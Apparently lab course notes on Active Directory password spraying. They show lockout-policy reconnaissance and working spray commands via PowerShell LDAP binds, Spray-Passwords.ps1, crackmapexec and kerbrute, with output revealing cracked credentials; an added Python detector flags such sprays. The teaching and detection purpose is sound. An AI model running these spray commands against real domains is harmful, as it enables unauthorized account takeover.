Password Spray Attacks
Execute net accounts to obtain the account policy.
PS C:\Users\root> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.
The Lockout threshold indicates a limit of five login attempts before lockout, which means we can safely attempt four logins before triggering a lockout. Although this may not seem like many, we should also consider the Lockout observation window, which indicates that thirty minutes after the last failed login the failed-attempt counter resets and we can make additional attempts.
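The defender's view of the two policy values above, added here as an example that is not part of the original page: a spray keeps each account's failure count under the Lockout threshold inside the observation window, so per-account lockout never fires, and the usable signal is instead many distinct accounts failing from one source within that window. The failed-logon records and host names are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Policy values from the "net accounts" output above.
LOCKOUT_THRESHOLD = 5
OBSERVATION_WINDOW = timedelta(minutes=30)

# Constructed failed-logon records (what Event ID 4625/4771 carries), assumed
# already parsed to (timestamp, account, source host). One password tried
# against every account from one host, plus a user mistyping his own password.
BASE = datetime(2022, 9, 6, 20, 30)
SAMPLE_FAILURES = [
    (BASE + timedelta(seconds=i), user, "CLIENT75")
    for i, user in enumerate(["dave", "jen", "pete", "bob", "alice", "carol"])
] + [
    (BASE + timedelta(minutes=1), "dave", "CLIENT74"),
    (BASE + timedelta(minutes=1, seconds=5), "dave", "CLIENT74"),
]

def failures_per_account(events, window=OBSERVATION_WINDOW):
    """Most failures any one account accrues inside one observation window,
    i.e. what the lockout counter (badPwdCount) sees."""
    by_account = defaultdict(list)
    for ts, account, _src in events:
        by_account[account].append(ts)
    worst = 0
    for times in by_account.values():
        times.sort()
        start = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window:
                start += 1
            worst = max(worst, end - start + 1)
    return worst

def detect_spray(events, window=OBSERVATION_WINDOW, min_accounts=LOCKOUT_THRESHOLD):
    """Sources that fail against >= min_accounts distinct accounts within one
    window: many accounts, few tries each, never tripping the lockout."""
    by_source = defaultdict(list)
    for ts, account, src in events:
        by_source[src].append((ts, account))
    alerts = {}
    for src, items in by_source.items():
        items.sort()
        for i, (ts, _acct) in enumerate(items):
            hit = {a for t, a in items[i:] if t - ts <= window}
            if len(hit) >= min_accounts:
                alerts[src] = max(alerts.get(src, 0), len(hit))
    return alerts
```

On the sample, no account reaches the threshold (the worst is dave at 3), yet CLIENT75 is flagged for touching six accounts in one window; min_accounts is a tuning assumption, not a Windows setting.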
LDAP and ADSI password spraying attack
The first kind of password spraying attack uses LDAP and ADSI to perform a low and slow password attack against AD users. In the Module Active Directory Introduction and Enumeration, we performed queries against the domain controller as the logged-in user with DirectoryEntry. However, we can also make queries in the context of a different user by passing that user's name and password to the DirectoryEntry constructor.
Manual Script
PS C:\Users\jeff> $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PS C:\Users\jeff> $PDC = ($domainObj.PdcRoleOwner).Name
PS C:\Users\jeff> $SearchString = "LDAP://"
PS C:\Users\jeff> $SearchString += $PDC + "/"
PS C:\Users\jeff> $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
PS C:\Users\jeff> $SearchString += $DistinguishedName
PS C:\Users\jeff> New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")
We could use this technique to create a PowerShell script that enumerates all users and performs authentications according to the Lockout threshold and Lockout observation window.
Spray-Passwords.ps1
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> powershell -ep bypass
...
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'
Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'
crackmapexec
kali@kali:~$ cat users.txt
dave
jen
pete
kali@kali:~$ crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [-] corp.com\dave:Nexus123! STATUS_LOGON_FAILURE
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\jen:Nexus123!
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\pete:Nexus123!
kali@kali:~$ crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\dave:Flowers1 (Pwn3d!)
kerbrute
PS C:\Tools> type .\usernames.txt
pete
dave
jen
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
Version: v1.0.3 (9dad6e1) - 09/06/22 - Ronnie Flathers @ropnop
2022/09/06 20:30:48 > Using KDC(s):
2022/09/06 20:30:48 > dc1.corp.com:88
2022/09/06 20:30:48 > [+] VALID LOGIN: jen@corp.com:Nexus123!
2022/09/06 20:30:48 > [+] VALID LOGIN: pete@corp.com:Nexus123!
2022/09/06 20:30:48 > Done! Tested 3 logins (2 successes) in 0.041 seconds